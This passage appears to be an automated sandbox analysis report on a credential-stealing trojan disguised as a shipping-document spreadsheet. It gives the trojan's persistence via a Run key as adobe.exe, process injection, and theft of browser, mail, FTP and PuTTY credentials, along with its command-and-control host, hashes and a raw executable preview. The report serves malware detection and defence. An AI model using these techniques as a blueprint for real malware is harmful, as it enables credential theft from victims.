                    Source: Yara matchFile source: 00000008.00000002.4198576799.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1752622729.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1751703167.0000000003D35000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Ship Docs YINGHAI-MANE PO 240786.xlsx.exe PID: 6892, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Ship Docs YINGHAI-MANE PO 240786.xlsx.exe PID: 6968, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 6332, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 6672, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e4a770.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e0f140.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.52e0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e4a770.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.adobe.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.52e0000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e0f140.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.1973196935.000000000330C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1970186494.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.4198295133.0000000002B9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4198576799.0000000002BBC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1973196935.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.4198295133.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4198576799.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1752622729.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1751703167.0000000003D35000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Ship Docs YINGHAI-MANE PO 240786.xlsx.exe PID: 6892, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Ship Docs YINGHAI-MANE PO 240786.xlsx.exe PID: 6968, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 6332, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: adobe.exe PID: 6672, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    1
                    Disable or Modify Tools
                    2
                    OS Credential Dumping
                    1
                    File and Directory Discovery
                    Remote Services11
                    Archive Collected Data
                    1
                    Ingress Tool Transfer
                    1
                    Exfiltration Over Alternative Protocol
                    Abuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    Registry Run Keys / Startup Folder
                    212
                    Process Injection
                    1
                    Deobfuscate/Decode Files or Information
                    21
                    Input Capture
                    24
                    System Information Discovery
                    Remote Desktop Protocol2
                    Data from Local System
                    11
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    Registry Run Keys / Startup Folder
                    11
                    Obfuscated Files or Information
                    1
                    Credentials in Registry
                    1
                    Query Registry
                    SMB/Windows Admin Shares1
                    Email Collection
                    1
                    Non-Standard Port
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                    Software Packing
                    NTDS211
                    Security Software Discovery
                    Distributed Component Object Model21
                    Input Capture
                    2
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading
                    LSA Secrets2
                    Process Discovery
                    SSH1
                    Clipboard Data
                    23
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                    Masquerading
                    Cached Domain Credentials141
                    Virtualization/Sandbox Evasion
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                    Virtualization/Sandbox Evasion
                    DCSync1
                    Application Window Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job212
                    Process Injection
                    Proc Filesystem1
                    System Network Configuration Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Hidden Files and Directories
                    /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1454351 Sample: Ship Docs YINGHAI-MANE PO 2... Startdate: 10/06/2024 Architecture: WINDOWS Score: 100 30 s4.serv00.com 2->30 32 api.ipify.org 2->32 52 Snort IDS alert for network traffic 2->52 54 Found malware configuration 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 9 other signatures 2->58 7 Ship Docs YINGHAI-MANE PO 240786.xlsx.exe 3 2->7         started        11 adobe.exe 3 2->11         started        13 adobe.exe 2 2->13         started        signatures3 process4 file5 28 Ship Docs YINGHAI-...240786.xlsx.exe.log, ASCII 7->28 dropped 60 Injects a PE file into a foreign processes 7->60 15 Ship Docs YINGHAI-MANE PO 240786.xlsx.exe 15 4 7->15         started        62 Multi AV Scanner detection for dropped file 11->62 64 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 11->64 20 adobe.exe 14 2 11->20         started        22 adobe.exe 2 13->22         started        signatures6 process7 dnsIp8 34 s4.serv00.com 213.189.52.181, 21, 49732, 49733 ECO-ATMAN-PLECO-ATMAN-PL Poland 15->34 36 api.ipify.org 172.67.74.152, 443, 49731, 49734 CLOUDFLARENETUS United States 15->36 24 C:\Users\user\AppData\Roaming\...\adobe.exe, PE32 15->24 dropped 26 C:\Users\user\...\adobe.exe:Zone.Identifier, ASCII 15->26 dropped 38 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 15->38 40 Tries to steal Mail credentials (via file / registry access) 15->40 42 Drops executable to a common third party application directory 15->42 44 Hides that the sample has been downloaded from the Internet (zone.identifier) 15->44 46 Tries to harvest and steal ftp login credentials 22->46 48 Tries to harvest and steal browser information (history, passwords, etc) 22->48 50 Installs a global keyboard hook 22->50 file9 signatures10

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    Ship Docs YINGHAI-MANE PO 240786.xlsx.exe42%ReversingLabsByteCode-MSIL.Trojan.Zilla
                    Ship Docs YINGHAI-MANE PO 240786.xlsx.exe50%VirustotalBrowse
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\Adobe\adobe.exe42%ReversingLabsByteCode-MSIL.Trojan.Zilla
                    C:\Users\user\AppData\Roaming\Adobe\adobe.exe50%VirustotalBrowse
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    api.ipify.org1%VirustotalBrowse
                    s4.serv00.com0%VirustotalBrowse
                    SourceDetectionScannerLabelLink
                    https://account.dyn.com/0%URL Reputationsafe
                    https://account.dyn.com/0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://s4.serv00.com0%VirustotalBrowse
                    https://api.ipify.org1%VirustotalBrowse
                    https://api.ipify.org/1%VirustotalBrowse
                    https://api.ipify.org/t0%VirustotalBrowse
                    https://api.ipify.org/t0%Avira URL Cloudsafe
                    https://api.ipify.org/0%Avira URL Cloudsafe
                    https://api.ipify.org0%Avira URL Cloudsafe
                    http://s4.serv00.com0%Avira URL Cloudsafe
                    http://crl.m0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.ipify.org
                    172.67.74.152
                    truefalseunknown
                    s4.serv00.com
                    213.189.52.181
                    truetrueunknown
                    NameMaliciousAntivirus DetectionReputation
                    https://api.ipify.org/false
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://api.ipify.orgShip Docs YINGHAI-MANE PO 240786.xlsx.exe, 00000000.00000002.1751703167.0000000003D35000.00000004.00000800.00020000.00000000.sdmp, Ship Docs YINGHAI-MANE PO 240786.xlsx.exe, 00000000.00000002.1752622729.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, Ship Docs YINGHAI-MANE PO 240786.xlsx.exe, 00000001.00000002.4198295133.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000003.00000002.1970186494.0000000000402000.00000040.00000400.00020000.00000000.sdmp, adobe.exe, 00000003.00000002.1973196935.0000000003291000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4198576799.0000000002B4C000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    http://crl.madobe.exe, 00000003.00000002.1977572355.000000000697B000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://account.dyn.com/Ship Docs YINGHAI-MANE PO 240786.xlsx.exe, 00000000.00000002.1751703167.0000000003D35000.00000004.00000800.00020000.00000000.sdmp, Ship Docs YINGHAI-MANE PO 240786.xlsx.exe, 00000000.00000002.1752622729.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, adobe.exe, 00000003.00000002.1970186494.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://api.ipify.org/tShip Docs YINGHAI-MANE PO 240786.xlsx.exe, 00000001.00000002.4198295133.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000003.00000002.1973196935.0000000003291000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4198576799.0000000002B4C000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameShip Docs YINGHAI-MANE PO 240786.xlsx.exe, 00000001.00000002.4198295133.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000003.00000002.1973196935.0000000003291000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4198576799.0000000002B4C000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://s4.serv00.comShip Docs YINGHAI-MANE PO 240786.xlsx.exe, 00000001.00000002.4198295133.0000000002B9C000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000003.00000002.1973196935.000000000330C000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4198576799.0000000002BBC000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    213.189.52.181
                    s4.serv00.comPoland
                    57367ECO-ATMAN-PLECO-ATMAN-PLtrue
                    172.67.74.152
                    api.ipify.orgUnited States
                    13335CLOUDFLARENETUSfalse
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1454351
                    Start date and time:2024-06-10 02:44:05 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 9m 50s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:10
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:Ship Docs YINGHAI-MANE PO 240786.xlsx.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@9/4@2/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 207
                    • Number of non-executed functions: 27
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    TimeTypeDescription
                    01:45:08AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run adobe C:\Users\user\AppData\Roaming\adobe\adobe.exe
                    01:45:16AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run adobe C:\Users\user\AppData\Roaming\adobe\adobe.exe
                    20:45:05API Interceptor10108119x Sleep call for process: Ship Docs YINGHAI-MANE PO 240786.xlsx.exe modified
                    20:45:18API Interceptor8810741x Sleep call for process: adobe.exe modified
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    172.67.74.152K8mzlntJVN.msiGet hashmaliciousUnknownBrowse
                    • api.ipify.org/
                    stub.exeGet hashmaliciousUnknownBrowse
                    • api.ipify.org/
                    stub.exeGet hashmaliciousUnknownBrowse
                    • api.ipify.org/
                    Sonic-Glyder.exeGet hashmaliciousStealitBrowse
                    • api.ipify.org/?format=json
                    Sky-Beta.exeGet hashmaliciousUnknownBrowse
                    • api.ipify.org/?format=json
                    Sky-Beta.exeGet hashmaliciousUnknownBrowse
                    • api.ipify.org/?format=json
                    Sky-Beta-Setup.exeGet hashmaliciousStealitBrowse
                    • api.ipify.org/?format=json
                    Sky-Beta.exeGet hashmaliciousStealitBrowse
                    • api.ipify.org/?format=json
                    SongOfVikings.exeGet hashmaliciousUnknownBrowse
                    • api.ipify.org/?format=json
                    SongOfVikings.exeGet hashmaliciousUnknownBrowse
                    • api.ipify.org/?format=json
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    api.ipify.orgShaderifyBeta 1.4.0.exeGet hashmaliciousUnknownBrowse
                    • 172.67.74.152
                    ShaderifyBeta 1.4.0.exeGet hashmaliciousUnknownBrowse
                    • 104.26.12.205
                    ShaderifyBeta 1.4.0.exeGet hashmaliciousUnknownBrowse
                    • 104.26.13.205
                    ShaderifyBeta 1.4.0.exeGet hashmaliciousUnknownBrowse
                    • 172.67.74.152
                    TS-240609-CStealer1.exeGet hashmaliciousPython Stealer, Creal StealerBrowse
                    • 104.26.13.205
                    https://ace-aviation.co.nz/help/contact/381354399391092Get hashmaliciousUnknownBrowse
                    • 104.26.12.205
                    SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.29520.6445.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                    • 172.67.74.152
                    DHL.xlam.xlsxGet hashmaliciousAgentTesla, PureLog StealerBrowse
                    • 104.26.12.205
                    MB263350411AE.xlam.xlsxGet hashmaliciousAgentTesla, PureLog StealerBrowse
                    • 104.26.12.205
                    DHL Package.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                    • 172.67.74.152
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    ECO-ATMAN-PLECO-ATMAN-PLBOQ_Algeemi_SharePoint_Tender.xlsx.exeGet hashmaliciousAgentTeslaBrowse
                    • 91.185.189.19
                    OriginalMessage.txt.msgGet hashmaliciousHTMLPhisherBrowse
                    • 31.186.83.254
                    Invoice_23257538_PDF.wsfGet hashmaliciousGuLoaderBrowse
                    • 31.186.83.248
                    WEB-SAT_base.apkGet hashmaliciousUnknownBrowse
                    • 77.79.227.218
                    WEB-SAT_base.apkGet hashmaliciousUnknownBrowse
                    • 77.79.227.218
                    Invoice 23257538_PDF.wsfGet hashmaliciousGuLoaderBrowse
                    • 31.186.83.248
                    Invoice 23257538_PDF.wsfGet hashmaliciousGuLoaderBrowse
                    • 31.186.83.248
                    Invoice 23457538_PDF.vbsGet hashmaliciousAsyncRAT, XWormBrowse
                    • 31.186.83.248
                    14-11-2023(1).exeGet hashmaliciousAgentTeslaBrowse
                    • 128.204.218.69
                    R7275-12112023.exeGet hashmaliciousAgentTeslaBrowse
                    • 128.204.218.69
                    CLOUDFLARENETUSImage is copyrighted.exeGet hashmaliciousLummaC, GO Backdoor, LummaC StealerBrowse
                    • 188.114.96.3
                    FYKNehdnEA.exeGet hashmaliciousLummaCBrowse
                    • 188.114.96.3
                    gCQQWnI6Y4.exeGet hashmaliciousLummaCBrowse
                    • 188.114.96.3
                    https://takipcifox.com/Get hashmaliciousHTMLPhisherBrowse
                    • 104.21.57.95
                    https://steam.communityfileshareds.com/sharedfiles/tropic_White_ChipGet hashmaliciousUnknownBrowse
                    • 188.114.96.3
                    http://me-airbnb.com/Get hashmaliciousUnknownBrowse
                    • 188.114.96.3
                    https://whatsapp.styyyuxp.shop/Get hashmaliciousUnknownBrowse
                    • 104.16.40.28
                    https://pub-7d92cd0bfba4484281fe4ef7b7323120.r2.dev/Linked.htmlGet hashmaliciousUnknownBrowse
                    • 104.16.123.96
                    https://ggzklqy22.njkirkorpwko86.dns-dynamic.net/Get hashmaliciousUnknownBrowse
                    • 188.114.96.3
                    https://www.telegramkd.com/Get hashmaliciousUnknownBrowse
                    • 104.21.18.65
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    3b5074b1b5d032e5620f69f9f700ff0ehttps://www.bassatis.e-skafos.gr/subscription/loginGet hashmaliciousHTMLPhisherBrowse
                    • 172.67.74.152
                    https://whatsapp.styyyuxp.shop/Get hashmaliciousUnknownBrowse
                    • 172.67.74.152
                    https://ggzklqy22.njkirkorpwko86.dns-dynamic.net/Get hashmaliciousUnknownBrowse
                    • 172.67.74.152
                    https://monumental-crostata-62tre3.netlify.app/dev.html/Get hashmaliciousUnknownBrowse
                    • 172.67.74.152
                    https://telegracm.org/aGet hashmaliciousUnknownBrowse
                    • 172.67.74.152
                    https://bet9933.com/Get hashmaliciousUnknownBrowse
                    • 172.67.74.152
                    https://gekas1-sg1asd-48fa40-tr1jha.netlify.app/dev.html/Get hashmaliciousUnknownBrowse
                    • 172.67.74.152
                    http://cepte-klima.xyz/Get hashmaliciousUnknownBrowse
                    • 172.67.74.152
                    https://remove-page-violation-submit.netlify.app/Get hashmaliciousUnknownBrowse
                    • 172.67.74.152
                    https://erac1-v123fas-525ytr-mv1ax.netlify.app/dev.html/Get hashmaliciousUnknownBrowse
                    • 172.67.74.152
                    No context
                    Process:C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):42
                    Entropy (8bit):4.0050635535766075
                    Encrypted:false
                    SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                    MD5:84CFDB4B995B1DBF543B26B86C863ADC
                    SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                    SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                    SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..
                    Process:C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):42
                    Entropy (8bit):4.0050635535766075
                    Encrypted:false
                    SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                    MD5:84CFDB4B995B1DBF543B26B86C863ADC
                    SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                    SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                    SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..
                    Process:C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe
                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):399360
                    Entropy (8bit):6.37865939346686
                    Encrypted:false
                    SSDEEP:6144:nG8/Pl5W2KYbjOrq1NijSchoiEC8IjhJwJpNhCF5qGI3f2nwf0F4eQhrt/bcnAI:n2rgijP7EHEsvNhC7IfBbhrt4T
                    MD5:9AD1097EF6D23A86D4B9327E54FDC9BC
                    SHA1:517D09C1D755F08F3C5BF073D87185A801B68907
                    SHA-256:DF9E1F7FA8D1BADAA7AFD42CC3AAC4EF5AAD3A9973EE71059599325284566E67
                    SHA-512:1EA9293A6931E191B1C63537FC5EA003E8AE98D53242A711769052BF9BA1976DEF2BB5F7894F85A0DA087C0A4354A68474268DA77D8438CFBB0A04299DF7C955
                    Malicious:true
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 42%
                    • Antivirus: Virustotal, Detection: 50%, Browse
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....%ff.....................Z........... ........@.. .......................`............@.....................................O........W...................@....................................................... ............... ..H............text........ ...................... ..`.rsrc....W.......X..................@..@.reloc.......@......................@..B........................H............T...........................................................0..........(....s......r...p(....o......r#..p(....o........i .....@(........i .....@(...........i(..........i(....(....o....(.............(....&*..(....*..(....*2~.....o....*VrK..p(....s.........*:.(......}....*.0..`........o.....0.s....z.(......{....(....ri..po....o.....{....(....ri..po....o.....{....o........io....*..{....*"..}....*..{....*"..}....*V.(......(......(....*>..(......(....*..{....*"..}....
                    Process:C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:modified
                    Size (bytes):26
                    Entropy (8bit):3.95006375643621
                    Encrypted:false
                    SSDEEP:3:ggPYV:rPYV
                    MD5:187F488E27DB4AF347237FE461A079AD
                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview:[ZoneTransfer]....ZoneId=0
                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Entropy (8bit):6.37865939346686
                    TrID:
                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    • Win32 Executable (generic) a (10002005/4) 49.78%
                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                    • Generic Win/DOS Executable (2004/3) 0.01%
                    • DOS Executable Generic (2002/1) 0.01%
                    File name:Ship Docs YINGHAI-MANE PO 240786.xlsx.exe
                    File size:399'360 bytes
                    MD5:9ad1097ef6d23a86d4b9327e54fdc9bc
                    SHA1:517d09c1d755f08f3c5bf073d87185a801b68907
                    SHA256:df9e1f7fa8d1badaa7afd42cc3aac4ef5aad3a9973ee71059599325284566e67
                    SHA512:1ea9293a6931e191b1c63537fc5ea003e8ae98d53242a711769052bf9ba1976def2bb5f7894f85a0da087c0a4354a68474268da77d8438cfbb0a04299df7c955
                    SSDEEP:6144:nG8/Pl5W2KYbjOrq1NijSchoiEC8IjhJwJpNhCF5qGI3f2nwf0F4eQhrt/bcnAI:n2rgijP7EHEsvNhC7IfBbhrt4T
                    TLSH:EC849B077A68C653F199F7BA6862D40C0BF96C5A1912CEDFAD8C7CC804B5BE44452F63
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....%ff.....................Z........... ........@.. .......................`............@................................
                    Icon Hash:31d89a929298d027
                    Entrypoint:0x45daee
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Time Stamp:0x66662585 [Sun Jun 9 21:58:29 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                    Instruction
                    jmp dword ptr [00402000h]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
